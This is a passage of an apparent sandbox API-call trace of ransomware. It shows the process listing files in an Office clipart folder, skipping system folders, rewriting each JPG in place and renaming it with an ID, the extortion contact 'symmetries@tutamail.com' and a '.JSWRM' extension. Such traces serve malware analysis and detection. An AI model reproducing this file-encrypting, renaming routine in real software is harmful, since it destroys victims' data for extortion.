lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f8a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341534.JPG", cAlternateFileName="")) returned 1 [0089.589] lstrcmpiW (lpString1="J0341534.JPG", lpString2=".") returned 1 [0089.589] lstrcmpiW (lpString1="J0341534.JPG", lpString2="..") returned 1 [0089.589] lstrcmpiW (lpString1="J0341534.JPG", lpString2="...") returned 1 [0089.589] lstrcmpiW (lpString1="J0341534.JPG", lpString2="windows") returned -1 [0089.589] lstrcmpiW (lpString1="J0341534.JPG", lpString2="recovery") returned -1 [0089.589] lstrcmpiW (lpString1="J0341534.JPG", lpString2="perflogs") returned -1 [0089.589] lstrcmpiW (lpString1="J0341534.JPG", lpString2="documents and settings") returned 1 [0089.589] lstrcmpiW (lpString1="J0341534.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.589] lstrcmpiW (lpString1="J0341534.JPG", lpString2="system volume information") returned -1 [0089.589] lstrcmpiW (lpString1="J0341534.JPG", lpString2="msocache") returned -1 [0089.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0089.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341534.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341534.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341534.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0089.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0089.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341534.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341534.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341534.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0089.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0089.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0089.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0089.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341534.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341534.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.591] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8074) returned 1 [0089.591] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f80) returned 0x205850 [0089.591] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1f80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1f80, lpOverlapped=0x0) returned 1 [0089.593] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.593] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1f80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1f80, lpOverlapped=0x0) returned 1 [0089.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0089.593] CloseHandle (hObject=0x314) returned 1 [0089.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0089.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0089.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0089.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0089.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0089.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0089.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.594] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341534.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341534.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341534.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341534.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0089.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0089.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0089.595] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5a56, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341551.JPG", cAlternateFileName="")) returned 1 [0089.595] lstrcmpiW (lpString1="J0341551.JPG", lpString2=".") returned 1 [0089.595] lstrcmpiW (lpString1="J0341551.JPG", lpString2="..") returned 1 [0089.595] lstrcmpiW (lpString1="J0341551.JPG", lpString2="...") returned 1 [0089.595] lstrcmpiW (lpString1="J0341551.JPG", lpString2="windows") returned -1 [0089.595] lstrcmpiW (lpString1="J0341551.JPG", lpString2="recovery") returned -1 [0089.595] lstrcmpiW (lpString1="J0341551.JPG", lpString2="perflogs") returned -1 [0089.595] lstrcmpiW (lpString1="J0341551.JPG", lpString2="documents and settings") returned 1 [0089.595] lstrcmpiW (lpString1="J0341551.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.596] lstrcmpiW (lpString1="J0341551.JPG", lpString2="system volume information") returned -1 [0089.596] lstrcmpiW (lpString1="J0341551.JPG", lpString2="msocache") returned -1 [0089.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0089.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341551.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341551.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341551.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0089.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0089.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341551.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341551.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341551.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0089.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0089.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0089.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0089.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341551.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341551.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.597] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=23126) returned 1 [0089.597] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a50) returned 0x24d210 [0089.597] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5a50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5a50, lpOverlapped=0x0) returned 1 [0089.600] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.600] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5a50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5a50, lpOverlapped=0x0) returned 1 [0089.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.600] CloseHandle (hObject=0x314) returned 1 [0089.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0089.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0089.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0089.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0089.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0089.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0089.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.600] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341551.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341551.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341551.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341551.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0089.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0089.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0089.601] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6f43, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341554.JPG", cAlternateFileName="")) returned 1 [0089.601] lstrcmpiW (lpString1="J0341554.JPG", lpString2=".") returned 1 [0089.601] lstrcmpiW (lpString1="J0341554.JPG", lpString2="..") returned 1 [0089.601] lstrcmpiW (lpString1="J0341554.JPG", lpString2="...") returned 1 [0089.601] lstrcmpiW (lpString1="J0341554.JPG", lpString2="windows") returned -1 [0089.601] lstrcmpiW (lpString1="J0341554.JPG", lpString2="recovery") returned -1 [0089.601] lstrcmpiW (lpString1="J0341554.JPG", lpString2="perflogs") returned -1 [0089.601] lstrcmpiW (lpString1="J0341554.JPG", lpString2="documents and settings") returned 1 [0089.601] lstrcmpiW (lpString1="J0341554.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.602] lstrcmpiW (lpString1="J0341554.JPG", lpString2="system volume information") returned -1 [0089.602] lstrcmpiW (lpString1="J0341554.JPG", lpString2="msocache") returned -1 [0089.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0089.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341554.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341554.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341554.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0089.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0089.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341554.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341554.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341554.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0089.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0089.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0089.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0089.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341554.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341554.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.602] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28483) returned 1 [0089.602] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6f40) returned 0x24d210 [0089.602] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6f40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6f40, lpOverlapped=0x0) returned 1 [0089.606] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.606] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6f40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6f40, lpOverlapped=0x0) returned 1 [0089.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.607] CloseHandle (hObject=0x314) returned 1 [0089.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0089.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0089.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0089.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0089.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0089.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0089.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.607] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341554.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341554.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341554.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341554.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0089.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0089.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0089.608] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6aa8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341557.JPG", cAlternateFileName="")) returned 1 [0089.608] lstrcmpiW (lpString1="J0341557.JPG", lpString2=".") returned 1 [0089.608] lstrcmpiW (lpString1="J0341557.JPG", lpString2="..") returned 1 [0089.608] lstrcmpiW (lpString1="J0341557.JPG", lpString2="...") returned 1 [0089.608] lstrcmpiW (lpString1="J0341557.JPG", lpString2="windows") returned -1 [0089.608] lstrcmpiW (lpString1="J0341557.JPG", lpString2="recovery") returned -1 [0089.608] lstrcmpiW (lpString1="J0341557.JPG", lpString2="perflogs") returned -1 [0089.608] lstrcmpiW (lpString1="J0341557.JPG", lpString2="documents and settings") returned 1 [0089.608] lstrcmpiW (lpString1="J0341557.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.608] lstrcmpiW (lpString1="J0341557.JPG", lpString2="system volume information") returned -1 [0089.608] lstrcmpiW (lpString1="J0341557.JPG", lpString2="msocache") returned -1 [0089.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0089.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341557.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341557.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341557.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0089.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0089.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341557.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, 